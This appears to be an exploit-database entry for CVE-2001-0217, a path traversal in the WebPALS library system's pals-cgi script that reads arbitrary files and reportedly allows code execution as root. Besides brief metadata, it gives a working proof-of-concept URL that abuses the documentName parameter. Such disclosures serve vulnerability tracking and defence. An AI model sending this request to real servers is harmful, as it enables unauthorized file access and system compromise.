[] NeoSense

PALS Library System WebPALS 1.0 - pals-cgi Traversal Arbitrary File Read

Author: cuctema
type: remote
platform: cgi
port: 
date_added: 2001-02-02 
date_updated: 2012-08-18 
verified: 1 
codes: CVE-2001-0217;OSVDB-507 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2372/info

A specially crafted URL composed of a known filename, will disclose the requested file residing on a machine running WebPALS. This vulnerability will also allow an attacker to execute arbitrary code with root privileges.


http://target/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file